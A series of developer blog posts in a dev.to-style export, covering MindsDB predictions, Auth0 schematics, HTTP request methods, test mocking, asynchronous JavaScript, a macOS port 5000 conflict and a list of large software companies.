FROM mindsdb.mobileprice_predictor
WHERE dual_sim ='0';
```

The predicted price range should be 0
```sql
SELECT price_range
FROM mindsdb.mobileprice_predictor
WHERE touch_screen ='0' and int_memory = 51;
```

The price range should be 3
Mobilistic! We have now successfully predicted the mobile phone price range with MindsDB
## Conclusion
This concludes the tutorial here.
Lastly, before you leave, I would love to know your feedback in the Comments section below and it would be really great if you drop a `LIKE` on this article.
| hridya423 |
1,238,660 | Quick JavaScript Authentication with OktaDev Schematics | Original post written by Matt Raible for Auth0 blog. Learn how to use OktaDev Schematics... | 0 | 2022-11-01T13:14:23 | https://auth0.com/blog/quick-javascript-authentication/?utm_source=devto&utm_medium=sc&utm_campaign=devto | javascript, programming, security | > Original post written by [Matt Raible](https://auth0.com/blog/authors/matt-raible/) for Auth0 blog.
### Learn how to use OktaDev Schematics to add authentication to your JavaScript projects.
### <br>
Hello,
My name is Matt Raible, and I am a developer advocate at Okta. In early 2019, I created OktaDev Schematics to simplify my life when doing Angular demos. But let me step back a bit first. I've worked at Okta for over five years; before that, I was an independent consultant for 20 years, mainly doing Java and web development for clients.
I've learned a lot about OpenID Connect (OIDC) and Okta's JavaScript SDKs over the years and only recently tried to use Auth0's JavaScript SDKs. Over the last couple of weeks, I learned how to use them and integrated many into OktaDev Schematics.
I was pleasantly surprised by the experience because the configuration often boils down to two main values: `domain` and `clientId`. You do have to add callback URLs too, but these are often the same as your app's homepage, so you don't need to add routes in your application. And then, it just works! There's no need to worry about issuers or other OIDC concepts.
This is a strong departure from how we've done things in Okta's SDKs, where we expect people to know about OpenID Connect. We often try to educate developers about OAuth and OIDC, but since these topics are complex, they can be challenging to understand. I like the approach of just needing two values, and everything just works!
## What Is OktaDev Schematics?
[OktaDev Schematics](https://github.com/oktadev/schematics) is a tool I developed to help streamline the integration of OpenID Connect into JavaScript (or TypeScript) applications.
In my first few years at Okta, I'd demo how to use our Angular SDK at conferences, and I'd inevitably miss a step, causing the demo to fail. A failing demo is frustrating, so I created OktaDev Schematics to fix it.
My idea was simple:
1. Create an app using the framework's CLI
2. Integrate OIDC authentication using templates
3. Add a unit test to prove nothing breaks
The project builds on [Angular Schematics](https://angular.io/guide/schematics), so it's incredibly easy to use, particularly in Angular projects, but applies to other frameworks as well.
```shell
ng add @oktadev/schematics
```
This command will prompt you for an issuer and client ID, and then OktaDev Schematics will configure your app to use them. If you're using the [Auth0 CLI](https://github.com/auth0/auth0-cli), you'll need to create a Single-Page Application (SPA) app to get these values.
```shell
auth0 apps create
```
> 💡 TIP: You can also create a SPA app using [the Auth0 dashboard](https://manage.auth0.com) if you prefer GUIs over CLIs.
In the latest release, I've made it so that adding an `--auth0` flag will set up your project to use Auth0 instead of Okta.
{% twitter 1566907778161049600 %}
- Angular: `ng new` and `ng add @oktadev/schematics --auth0`
- Ionic: `ionic start` and `ng add @oktadev/schematics --auth0`
My [Add OpenID Connect to Angular Apps Quickly](https://auth0.com/blog/add-oidc-to-angular-apps-quickly/) tutorial explains what this command does and shows screenshots of the changes. You can even [view the changes it makes on GitHub](https://github.com/oktadev/auth0-angular-example/pull/1/files).
The tool is smart enough to detect the framework you're using and if you're using TypeScript or JavaScript.
If you want to create a React or Vue app, you'll need to perform a few steps:
1. Create your React app with Create React App:
```shell
npx create-react-app secure-app
```
> 💡 TIP: Add `--template typescript` if you want TypeScript support.
For Vue, use `npx @vue/cli create secure-app`.
2. Install the Schematics CLI globally:
```shell
npm i -g @angular-devkit/schematics-cli
```
3. In the `secure-app` project, install OktaDev Schematics and run the `add-auth` schematic:
```shell
npm i -D @oktadev/schematics
schematics @oktadev/schematics:add-auth
```
As you can guess, the integration is pretty bare-bones. It configures the SDK and adds a login/logout button. I believe this is in line with the apps each CLI generates. They're pretty bare-bones too!
If you'd like to see how the templates differ between Okta and Auth0, you can [view the templates on GitHub](https://github.com/oktadev/schematics/tree/main/src/add-auth). If you have a GitHub account, you can also [launch github.dev/oktadev/schematics](https://github.dev/oktadev/schematics) and navigate to `src/add-auth/{auth0,okta}`.

## JavaScript Framework Support
There's a wealth of popular frameworks currently supported by OktaDev Schematics:
- [Angular](https://github.com/oktadev/schematics#angular)
- [React](https://github.com/oktadev/schematics#react)
- [Vue](https://github.com/oktadev/schematics#vue)
- [Ionic with Angular](https://github.com/oktadev/schematics#ionic)
- [React Native](https://github.com/oktadev/schematics#react-native)
- [Express](https://github.com/oktadev/schematics#express)
See the project's [links section](https://github.com/oktadev/schematics#links) if you want to learn more about Okta or Auth0's SDKs.
The support for Ionic currently only includes Angular. However, Ionic does support React and Vue too. To make OIDC authentication work, I leveraged [Ionic AppAuth](https://github.com/wi3land/ionic-appauth). One cool thing about this library is it has [React](https://github.com/wi3land/ionic-appauth/tree/master/demos/react) and [Vue](https://github.com/wi3land/ionic-appauth/tree/master/demos/vue) examples available. I recently updated these to work with Capacitor 4.
{% twitter 1566829762026291200 %}
[Read more...](https://auth0.com/blog/quick-javascript-authentication/?utm_source=devto&utm_medium=sc&utm_campaign=devto) | robertinoc_dev |
1,238,761 | Video: An Intro to AI Builder on Power Automate | A new video this week. Bringing a quick introduction to the AI Builder feature on Power... | 0 | 2022-11-10T20:07:14 | https://barretblake.dev/2022/11/video-an-intro-to-ai-builder-on-power-automate/?utm_source=rss&utm_medium=rss&utm_campaign=video-an-intro-to-ai-builder-on-power-automate | development, video, aibuilder, flow | ---
title: "Video: An Intro to AI Builder on Power Automate"
published: true
date: 2022-11-01 14:30:00 UTC
tags: Development,Video,AIBuilder,flow
canonical_url: https://barretblake.dev/2022/11/video-an-intro-to-ai-builder-on-power-automate/?utm_source=rss&utm_medium=rss&utm_campaign=video-an-intro-to-ai-builder-on-power-automate
---
A new video this week. Bringing a quick introduction to the AI Builder feature on Power Automate.
<iframe title="A Quick Introduction to AI Builder On Power Automate" width="1200" height="675" src="https://www.youtube.com/embed/0b8nfyR0AKY?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
The post [Video: An Intro to AI Builder on Power Automate](https://barretblake.dev/2022/11/video-an-intro-to-ai-builder-on-power-automate/) first appeared on [Barret Codes](https://barretblake.dev). | barretblake |
1,238,843 | Bitcoin Blockchain Bullshit? | American Chopper Senior and Junior have strong opinions about BBB - Bitcoin, Blockchain and the... | 0 | 2022-11-01T15:54:56 | https://dev.to/jmfayard/bitcoin-blockchain-bullshit-b6c | watercooler, healthydebate, blockchain, bitcoin | American Chopper Senior and Junior have strong opinions about BBB - Bitcoin, Blockchain and the Bullshit around it.
## Is Bitcoin a real currency?
_Image is too small to be readable? Click on it_

*Background: people don't wake up every morning wondering if the euro or the dollar are up or down. Instead they try to produce things of value, and use a currency to exchange it against something else. The currency itself is not the end goal.*
## Blockchain over-engineering?
_Image is too small to be readable? Click on it_

See:
* [Merkle tree - Wikipedia](https://en.wikipedia.org/wiki/Merkle_tree)
* [Consensus (computer science) - Wikipedia](https://en.wikipedia.org/wiki/Consensus_(computer_science))
## Bad Central Banks?

See [Crypto-anarchism - Wikipedia](https://en.wikipedia.org/wiki/Crypto-anarchism)
## Burning precious limited resources?

* [Bitcoin energy consumption 2022 | Statista](https://www.statista.com/statistics/881541/bitcoin-energy-consumption-transaction-comparison-visa/)
* [Resource depletion - Wikipedia](https://en.wikipedia.org/wiki/Resource_depletion)
* [Climate change - Wikipedia](https://en.wikipedia.org/wiki/Climate_change)
## Bigger images please?
I'm a backend developer so I don't understand CSS and why the images are so small currently.
Here they are in full resolution
* [Bitcoin is not a real currency](https://imgflip.com/i/6z403x)
* [Why do you want to put everything on the blockchain?](https://imgflip.com/i/6z40gr)
* [Bad Central Banks?](https://imgflip.com/i/6z41a7)
* [The planet is burning](https://imgflip.com/i/6z40uw)
| jmfayard |
1,238,845 | Top ways to call an API | If you want to build your million-dollar startup or a hobby project, first, you need a server that... | 0 | 2022-11-01T16:19:05 | https://dev.to/vegan_tech/top-ways-to-call-an-api-3f8a | api, testing | If you want to build your million-dollar startup or a hobby project, first, you need a server that manages your data and logic. To build a server, you need to know how a server works.
A server usually contains multiple APIs. APIs are like a road that is used to send and receive data. Each API can be called in many different ways. Today I'll show you some of those ways.
First of all, we need an API server. You can create your own server using your favorite programming language, or you can use services like https://webhook.site, which lets you test APIs without needing to create a server.
Now we're going to demonstrate the ways to call APIs using the [Postman](https://www.postman.com) and the [API Tester](https://apitester.org) (supports Android & iOS).
**1. GET**
GET is the most popular way to call an API, and it can be called from a browser directly. As the name suggests, it is usually used to fetch data from the server.
To call an API using the GET method, in Postman, select GET(1), input the API URL(2), and hit send(3).

The webhook page shows that the API got called using the GET method.

Let's do the same using the API Tester APP (which supports Android & iOS ). First, open the app and click on the Create new request button.

From there, click on GET.

Then input the webhook URL and click the send button at the top-right corner.

You'll see there's a new call to the API with the GET method.

**2. POST**
The POST method is usually used to send data to the server from the app. For example, to call an API using the POST method, in Postman, select POST, input the API URL, and hit send.

Or, if you prefer your smartphone, in the API Tester app, create a new request using the POST option.

Then input the API URL and click send.

In the webhook page, you'll see it got called using the POST method.

**3. PUT**
The PUT method is usually used to send data to the server from the app but to change or update specific data. For example, to call an API with the PUT method, in Postman, select PUT, input the API URL, and hit send.

Or, with the API Tester app, create a new request using the PUT option.

Then input the API URL and click send.

In the webhook page, you'll see it got called using the PUT method.

**4. DELETE**
The DELETE method is usually used to delete one or multiple data. To call an API with the DELETE method, in Postman, select DELETE, input the API URL, and hit send.

In the API Tester app, create a new request using the DELETE option.

Then input the API URL and click send.

In the webhook page, you'll see it got called using the DELETE method.

These are not all of them; there are other methods like PATCH, COPY, HEAD, and so on.

All these methods can be found in the API Tester app, which supports even more methods out of the box. Here are some screenshots of the supported methods in the API Tester app.



You can also call an API with a custom method of your own, maybe your name, your company name, or your app name.
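The same idea also works from code. Here is a sketch using Python's standard `urllib`, which accepts any method string, including a custom one (the URL below is a placeholder for your own webhook endpoint, and the requests are only built here, not sent):

```python
import json
import urllib.request

def build_request(url, method="GET", data=None):
    # urllib lets you set the HTTP method explicitly,
    # including non-standard custom methods.
    body = json.dumps(data).encode() if data is not None else None
    req = urllib.request.Request(url, data=body, method=method)
    if body is not None:
        req.add_header("Content-Type", "application/json")
    return req

url = "https://webhook.site/your-unique-id"           # placeholder endpoint
get_req = build_request(url)                          # GET
post_req = build_request(url, "POST", {"name": "x"})  # POST with a JSON body
custom_req = build_request(url, "MYAPPNAME")          # your own custom method
# To actually send one: urllib.request.urlopen(get_req)
```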
If you want to test different APIs from your phone, give the API Tester app a try. It's free and supports Android & iOS.
Now that you have created a server with multiple APIs, you want to protect it from hackers. Learn the top ways you can protect your server from hackers in my previous [post.](https://dev.to/vegan_tech/top-ways-to-secure-apis-from-hackers-4jl7)
| vegan_tech |
1,238,853 | Monthly Challenge #1: Palindrome 🔤 | Welcome to Codédex's first ever Monthly Twitter Challenge! This one is created by our SWE Intern,... | 20,371 | 2022-11-01T16:39:08 | https://dev.to/codedex/monthly-twitter-challenge-1-palindrome-3hg6 | python, challenge, beginners, codedex | Welcome to Codédex's first ever Monthly Twitter Challenge! This one is created by our SWE Intern, @asiqurrahman. 🙌
{% embed https://twitter.com/codedex_io/status/1587072993448058883 %}
**Palindrome:**
A word, sentence, or number that reads the same forward or backward (e.g., _racecar_, _civic_, and _121_).
**Challenge:**
Create a Python function that:
1. Takes in a string as a parameter.
2. Checks if it's a palindrome.
3. Returns `True` if it is or `False` if it's not.
**Requirements:**
- 📦 Don’t use any packages.
- 💬 Make sure to comment the code.
Post your program screenshot in the [Twitter thread](https://twitter.com/codedex_io/status/1587072993448058883).
And we will pick a random winner by noon this Friday. The prize is a free [Codédex tee](https://codedex.myshopify.com) and bragging rights! 🏆
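For anyone who wants to compare notes, here is a minimal sketch of one possible approach (purely illustrative; the function name is my own choice, and plenty of other solutions work):

```python
def is_palindrome(value):
    """Return True if value reads the same forward and backward."""
    # Convert to string first so numbers like 121 work too.
    text = str(value).lower()
    # A palindrome equals its own reverse.
    return text == text[::-1]

print(is_palindrome("racecar"))  # True
print(is_palindrome("hello"))    # False
```

Lowercasing first means `"Racecar"` also counts, and `str(value)` lets the same function handle both strings and numbers.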
---
_**Update:**_
We have a winner of the Codédex Monthly Challenge: Palindrome! 🥁...
Congrats to Michael Gonzalez! 🇪🇨
The reasons being:
- Solution covers string & number
- Good comments
- Good breakdown of the functions
- First to post bonus
Here's the solution:
{% embed https://twitter.com/mgonzalez14291/status/1587105952607703040 %} | sonnynomnom |
1,239,084 | API Mocking: Essential and Redundant | I love contradictions where both states of truth can work at the same time. Case in point this tweet... | 0 | 2022-11-01T18:42:38 | https://debugagent.com/api-mocking-essential-and-redundant | java, testing, programming, tutorial | I love contradictions where both states of truth can work at the same time. Case in point this tweet about mocking from the other week:
[](https://twitter.com/mcsee1/status/1582762075289374720)
> If you use mocks, you are not testing.
My answer was:
[](https://twitter.com/debugagent/status/1582919132856864768)
> Mocks help assert limited fixed functionality and they do it FAST.
>
> Which is what unit tests are about. Mocks are an essential part of a wider quality strategy. Otherwise you will spend your time in integration test churn.
>
> No, they are not enough. But they do test.
It would seem we are both saying the exact opposite but in fact that isn’t necessarily the case. I get what Maxi is saying here and his point is very valid. Mocks are problematic.
## The Problems with Mocks
Mocks hide external dependencies on the real API, and as a result they don't test them. This limits the scope of the test to a very narrow, hard-coded set. The test relies on internal implementation details, such as the dependencies used to implement the code under test, which means it will probably fail if the implementation changes even though the contract doesn't change. Let's look at an example:
```java
public int countUserCities() {
    return db.executeInt("select count(city) from users");
}
```
We can mock the db function `executeInt` so it returns a fixed result, since there is no real database behind the unit test. But this will break if we change the original API call to something like this:
```java
public int countUserCities() {
    return db.count("city", "users");
}
```
This covers nothing. A far better approach is to add fake data to a temporary database which is exceedingly easy to do thanks to projects such as [Testcontainers](https://www.testcontainers.org/). We can spin up containers dynamically and “properly” check the method with a database similar to the one we have in production. This performs the proper check, it will fail for bugs like a typo in the query and doesn’t rely on internal implementation.
Unfortunately, this approach is problematic. Loading a fresh database takes time. Even with containers. Doing it for every suite can become a problem as the scope of testing grows. That’s why we separate the unit and integration tests. Performance matters.
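Returning to the `countUserCities` example, the coupling problem can be shown in a tiny self-contained sketch. The `Db` interface, the hand-rolled stub, and the number `7` are all hypothetical, invented for illustration; a real project would typically use a mocking library instead:

```java
// Hypothetical dependency interface, reduced to the two calls discussed above.
interface Db {
    int executeInt(String query);
    int count(String column, String table);
}

// Hand-rolled stub: only executeInt returns the canned value a unit test expects.
class StubDb implements Db {
    public int executeInt(String query) { return 7; }
    public int count(String column, String table) { return 0; }
}

class UserService {
    private final Db db;

    UserService(Db db) { this.db = db; }

    int countUserCities() {
        // Switching this line to db.count("city", "users") keeps the contract,
        // but silently invalidates the stub above and breaks the test.
        return db.executeInt("select count(city) from users");
    }
}
```

A test pinned to `executeInt` passes today and fails after the refactor, even though `countUserCities` still honors its contract.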
## The Performance Problem
You know what’s the worst type of testing?
The ones you don’t run and end up deleting.
Testing frequently is crucial; continuous testing lets us fail quickly during development. A quick failure means the change that triggered it is still fresh in our minds. You don't need git bisect; you can fix things almost instantly. For this to work properly, we need to run testing cycles all the time. If it takes a while to go through a testing workflow and requires some configuration (e.g., Docker) that might collide with the CPU architecture (e.g., M1 Mac), then we might have a problem.
We mock external dependencies for the unit tests so performance will improve. But we can't give up on the full call to the actual API, because the mocking has issues. However, those tests can run in the CI process; we don't need to run them all the time. Does this breed duplication? Yes. It sucks and I don't like it.
Unfortunately, there’s no other way I’m aware of at this time. I tried to think about a way around this with code that would act as a unit test in one execution and as an integration test invoking the real counterpart when running in CI. But I couldn’t come up with something workable that didn’t make things worse.
Because of this I think it’s important to check coverage of integration tests only. The unit test coverage is interesting but not as crucial as the integration coverage. I’m not in favor of 100% coverage. But it is an important statistic to monitor.
## What Should We Mock?
I gave the database example but I’m not in favor of mocking databases. For Java I typically use a light in-memory database which works well with most cases. Fakers accept CSV formats to fill up the database and can even come up with their own fake data. This is better than mocking and lets us get close to integration test quality with unit test performance.
However, we can't constantly connect to web service dependencies without mocking. In that sense, I think it's a good idea to mock everything that's outside of our control. At that point, we face the choice of where to mock. We can use mock servers that include coded requests and responses. This makes sense when working with an integration test; not so much for a unit test, but we can do it if the server is stateless and local. I'd prefer mocking the call to the API endpoints in this case, though. It will be faster than the actual API, but it could still cause problems.
Over-mocking is the process of applying mocks too liberally to too many API calls. A developer might engage in that in order to increase the coveted coverage metric. This further strengthens my claim that coverage shouldn't apply to unit tests as it might lead to such a situation. Behavior shouldn't be mocked for most local resources accessed by a framework.
## Finally
I love mocking. It made the development of some features possible. Without it I couldn't properly check plugins, APIs, servers, etc. However, like all good sweets, too much of a "good thing" can corrupt our code. It's also only a small part of a balanced meal (stretching the metaphor, but it works). We can't just write mocked tests and call it a day; we can't rely on mocking alone. On the contrary, mocks aren't the "real" badge of quality we seek.
Integration testing occupies that spot. When we have coverage there, we have important, valuable coverage. Mocking is wonderful for narrowing down problems and avoiding regressions. When I need to check that a fix is still in place, mocked testing is the perfect tool. Development of such components is problematic and fragile. But that's a good thing; we want that code to be tied to the implementation a bit.
Some operations would be difficult to cover without proper mocking. When testing the entire system that might be reasonable to expect but not for functional testing. In these cases, we need a fast response and the actual API might not be enough.
| codenameone |
1,239,096 | Asynchronous processing in JavaScript | This is a continuation of Introduction to node and npm 1. Introduction JavaScript engines... | 0 | 2023-04-15T13:48:36 | https://dev.to/adderek/asynchronous-processing-in-javascript-5adh | javascript, beginners | This is a continuation of [Introduction to node and npm](https://dev.to/adderek/intro-to-node-and-npm-3apd)
## 1. Introduction
JavaScript engines are generally single-threaded. A long-running call would normally block every other call, but we leverage asynchronous processing to interrupt the currently executing procedure, allowing the engine to switch between jobs. Behind the scenes, input/output is multi-threaded.
There are many ways JS developers could achieve effects similar to multi-threading.
## 2. How asynchronous processing works
You send a message (e.g., a request to process a resource, like "add a new user to the system") and usually get a confirmation that the request was received. In REST this might be 202 (Accepted) and a "Location" header; in messaging systems, a valid _ID of the request_.
But the message is only queued for processing, not yet processed.
Whenever the system has free resources (e.g., it is not doing anything more important or queued before your request), your request can be processed. This usually takes between milliseconds and weeks. It could be, for example, a request to add a new bank account that must be verified by someone.
When requesting something, feedback (a confirmation and/or return data) is often expected. This is usually done with a message sent by the processing system to a place you can access. Often it would contain a "correlation-id", i.e., the _ID of the request_, to indicate it is a response to a previous request. Simply put: we cannot send the response yet, but we can send instructions (e.g., a URL) to check whether it has already finished.
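The flow described above can be sketched with a tiny in-memory toy. All names here, like `submit` and `poll`, are invented for illustration:

```javascript
// Toy model of "accept now, process later, poll with the request ID".
const jobs = new Map();
let nextId = 1;

function submit(payload) {
  const id = nextId++;
  jobs.set(id, { status: "queued" });
  // Pretend the system processes the request once it has free resources.
  setTimeout(() => {
    jobs.set(id, { status: "done", result: payload.toUpperCase() });
  }, 10);
  return { accepted: true, id }; // like HTTP 202 plus a location to check later
}

function poll(id) {
  return jobs.get(id); // the caller checks back using the request ID
}

const ticket = submit("add user");
console.log(poll(ticket.id).status); // "queued" right after submission
```

The caller gets an acknowledgment immediately and uses the returned `id` (the correlation-id) to ask for the result later.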
## 3. Several attempts to use asynchronous processing
### 3.1. How the code execution gets postponed
In JavaScript, calls can be postponed whenever you use a promise (or async/await, which uses promises behind the scenes).
```
async function log1(msg) {
await console.log(msg);
}
async function log2(msg) {
console.log(msg);
}
function log3(msg) {
console.log(msg);
}
function log4(msg) {
return new Promise(resolve=>console.log(msg));
}
setTimeout(()=>log1(1), 0);
setTimeout(()=>log2(2), 0);
setTimeout(()=>log3(3), 0);
setTimeout(()=>log4(4), 0);
```
Usually prints 1,2,3,4 as expected.
Internally those are 4 different calls scheduled to happen with 0ms delay (no delay), and the order of execution is not guaranteed to follow that sequence.
`log1` is async (returns a promise) and suspends when calling `console.log` because there is `await`. Once called, the promise is not yet fulfilled; it will be after `console.log` returns, `log1` continues, and finally returns. You are sure that `console.log` returns before `log1` gets fulfilled (only because there is `await`).
`log2` is async (returns a promise) and triggers `console.log` and returns. You have no guarantee that `console.log` prints output before `log2` gets fulfilled.
`log3` is just a function. The `console.log` might be scheduled but `log3` returns and continues to execute your code. The JavaScript thread is blocked until it returns (though it can schedule some promises).
`log4` returns a promise whose executor runs `console.log` immediately. Note, however, that `resolve` is never called, so the returned promise stays "pending" forever and never becomes "fulfilled".
Think about it thoroughly: you could also omit `setTimeout` in 3 out of 4 cases; then the call is made and a "pending promise" is returned. In fact, the case of `log3` is probably the most dangerous.
If you are using node, then internally [libuv](https://github.com/libuv/libuv) is used for calls and also for anything like input/output (ex. to print something onto the console).
### 3.2. Calling other applications
You can send a request to another system, service, or application. You can send a REST request and should wait for the response (even "Accepted" when the task is only queued), or publish to a queue yourself.
### 3.3. Workers
Node can run parallel instances of node called "workers". Workers can act as a parallel process to perform heavy work without blocking the main thread.
## 4. What to look at
### 4.1. Intervals
You can schedule a method to be called with a fixed interval:
```
let counter = 0;
let intervalHandle = undefined;
const intervalInMilliseconds = 10;
function myMethod() {
counter++;
for(let i = 0; i < 9999; i++){console.log(i);}
if(counter > 10) {
clearInterval(intervalHandle);
intervalHandle = null;
}
}
intervalHandle = setInterval(myMethod, intervalInMilliseconds);
```
You could expect that it prints the numbers from 0 to 9998 every 10ms until the counter exceeds 10, finishing within roughly 100ms.
The issue is that you have no guarantee that methods would be called every 10ms. This could lead to 2 problems:
- Your method could be called more than once at the same time (if it is using asynchronous processing internally)
- Your method could be executed with longer interval (it needs to print the numbers first)
A slightly corrected version:
```
let counter = 0;
const minimumIntervalInMilliseconds = 10;
function myMethod() {
counter++;
for(let i = 0; i < 9999; i++){console.log(i);}
if(counter <= 10) {
setTimeout(myMethod, minimumIntervalInMilliseconds);
}
}
setTimeout(myMethod, minimumIntervalInMilliseconds);
```
## 5. Dangers of a single-threaded app
If your application runs inside a docker container that has a healthcheck and restarts whenever healthcheck is not responded (ex. timeout 1s, interval 1s), then any job blocking main thread for 1000ms would result in container being restarted.
If your app runs on Kubernetes and is blocked past the timeout threshold, then your application might be "disconnected" (readiness probe) or restarted (liveness probe).
If you are connected to a queue (e.g., Kafka or RabbitMQ) and your application is busy past the timeout (e.g., 3000ms for a Kafka subscriber), then your application will be kicked out and considered "dead". I have seen this scenario where developers tried to update RabbitMQ and its libraries searching for an issue in the server, while the cause was in the Node code. | adderek |
1,239,164 | Port 5000 is already in use macOS Monterey | After an update on my laptop, I got an issue. I have started the Docker container, but it fails. The... | 0 | 2022-11-01T20:10:32 | https://jakeroid.com/blog/port-5000-is-already-in-use-in-macos-monterey/ | macos, docker | <!-- wp:paragraph -->
<p>After an update on my laptop, I got an issue. I have started the Docker container, but it fails. The port 5000 is already in use. Hmm, maybe another container took it. Ah, Airplay took it... Did you get the same issue? Let's fix it. </p>
<!-- /wp:paragraph -->
<!-- wp:more -->
<!--more-->
<!-- /wp:more -->
<!-- wp:paragraph -->
<p>A long time ago, I started using 5000 ports for my projects. Usually, it is a web service. This is useful because you can't run many services on port 80. With port 5000, I can run containers with a web server, for example, on 5000, 5001, 5002, etc. This is easy to remember a thing. I started using it after some Flask (Python Framework) experience. </p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>So, I started another container and got an error "Port 5000 is already in use". I checked my compose file and open ports and didn't understand the issue. After some research, I remembered about OS updates. Okay, catch you! </p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>In macOS Monterey, Apple added the ability to use your Mac as an AirPlay device. For example, you can stream something from your iPhone to your MacBook. </p>
<!-- /wp:paragraph -->
<!-- wp:heading -->
<h2>Solution</h2>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>Solution #1: This is stupid, but you could use a lot of other ports. For example, now I am using 6000 and other similar ports instead of 5000. The pro of this approach is that you keep AirPlay enabled on your Mac. There are a lot of open ports, but 5000 was like a habit (not a hobbit). </p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>Solution #2: You could disable AirPlay. Go to System Preferences - Sharing. At the bottom, you will see the AirPlay Receiver checkbox. Disable it to free up the port.</p>
<!-- /wp:paragraph -->
<!-- wp:image {"id":2619,"sizeSlug":"large","linkDestination":"none"} -->
<figure class="wp-block-image size-large"><img src="https://jakeroid.com/wp-content/uploads/2022/06/image-1024x844.png" alt="Port 5000 is already in use in macOS Monterey" class="wp-image-2619"/></figure>
<!-- /wp:image -->
<!-- wp:paragraph -->
<p>I prefer the first way because using AirPlay on my MacBook could be useful. Anyway, it's good to have a choice. I hope this small note was helpful to you. </p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>By the way, I made a small note about <a href="https://jakeroid.com/blog/how-to-remove-skype-icon-from-menu-bar/">how to remove the Skype icon from menubar on macOS</a>. Would you like to check it? </p>
<!-- /wp:paragraph --> | jakeroid |
1,273,159 | Top 5 Software Companies in the World | Top 10 software companies in the world Computers would be useless without programs that convert... | 0 | 2022-11-26T04:43:43 | https://dev.to/geekstalk/top-5-software-companies-in-the-world-20nm | <p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheBXEWHiKx6wzx-zm-x04zTDwNUNwkkGNEpOkQi9X4HReUJkDYB2IrAYzfBzSPULRsd4MV6hWDwN0yk_fmUfulKvoDLKd-Hd0q4zXkdf_orrfiN8PTLUCGw-a3WogkeFELNy3lH3ECxv_92kqjV3DqPznhXpAc0FadK4kLfZA-OKhivdYJw6qXXNaVDg/s1920/Top%2010%20software%20Companies%20in%20the%20world.jpg" style="margin-left: 1em; margin-right: 1em;"><img alt="Top 10 Software Companies in the World" border="0" data-original-height="1280" data-original-width="1920" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheBXEWHiKx6wzx-zm-x04zTDwNUNwkkGNEpOkQi9X4HReUJkDYB2IrAYzfBzSPULRsd4MV6hWDwN0yk_fmUfulKvoDLKd-Hd0q4zXkdf_orrfiN8PTLUCGw-a3WogkeFELNy3lH3ECxv_92kqjV3DqPznhXpAc0FadK4kLfZA-OKhivdYJw6qXXNaVDg/w348-h294/Top%2010%20software%20Companies%20in%20the%20world.jpg" title="Top 10 Software Companies in the World" width="348" /></a></div><br /><p></p><h1 style="text-align: left;">Top 10 software companies in the world </h1><br /><span style="font-size: medium;">Computers would be useless without programs that convert physical hardware into auxiliary functions discuss <b>Top 10 Software Companies in the World</b>. Software refers to programs and data that are executed on a computer. Software is classified into four categories: programming services, system services, open-source, and software as a service. Software companies make money through a variety of means, including software licensing, maintenance services, subscription fees, and support services. 
<br /><br />A software company develops and distributes computer software that can be used to learn, instruct, evaluate, calculate, entertain, or perform a multitude of other tasks. Software companies operate under a variety of business models, such as charging license fees, offering subscriptions, or charging transactions. Customers can now pay a monthly subscription fee to gain instant access to software on provider servers using cloud technology. Which is growing rapidly. Region. Software companies are among the world's largest developers of enterprise solutions. <br /><br />Without software, it is impossible to conduct day-to-day business in the technology industry. Software is available for a variety of purposes including entertainment, business and security. So, let's take a look at some of the top ten software companies in terms of revenue or ancillary. These are the top 10 software companies based on past 12 months sales. </span><br /><br /><h2 style="text-align: left;">1. Microsoft</h2><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiASkVgk_cG8tqnHeQxAu-1W4UJ3Kbhwz-zsrrCJi5zFmA0_bMNmLDIX_p6eVGfD7sCJJEKph8YnlFMkvzMNvdAKPqk8FnfgbpU-JwXwjTjuezNDg5tA0j-IHNfZVTLcLjzOnSTYNFFT-_2CPi6rQ5ZtbqGt3fN39eusMFPtbaPdGotWNqBMACRmXUDuA/s367/top-10-software-companies-in-the-world1.png" style="margin-left: 1em; margin-right: 1em;"><img alt="Top 10 Software Companies in the World" border="0" data-original-height="137" data-original-width="367" height="119" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiASkVgk_cG8tqnHeQxAu-1W4UJ3Kbhwz-zsrrCJi5zFmA0_bMNmLDIX_p6eVGfD7sCJJEKph8YnlFMkvzMNvdAKPqk8FnfgbpU-JwXwjTjuezNDg5tA0j-IHNfZVTLcLjzOnSTYNFFT-_2CPi6rQ5ZtbqGt3fN39eusMFPtbaPdGotWNqBMACRmXUDuA/w320-h119/top-10-software-companies-in-the-world1.png" title="Top 10 Software Companies in the World" width="320" /></a></div><br /><span style="font-size: medium;"><a 
href="https://en.wikipedia.org/wiki/Microsoft" target="_blank">Microsoft</a> offers a diverse set of products and services. Microsoft was founded in 1975 by bill gates and paul allen. Some of the most popular microsoft software products are the windows operating system, the microsoft office suite, and the internet explorer and edge web browsers. The company's main selling gear is the microsoft surface line of xbox video game consoles and touchscreen personal pcs. Microsoft was ranked 21st in the fortune 500 list of the largest companies in the united states in 2020. It is one of the largest software firms in the world in terms of revenue. It is one of the "big five" corporations in the information technology industry in the united states. M / s. Office makes basic office tasks more manageable and increases productivity. Each program corresponds to certain activities, such as word processing, data management, presentation creation, and email management. </span><br /><br /><h2 style="text-align: left;">2. 
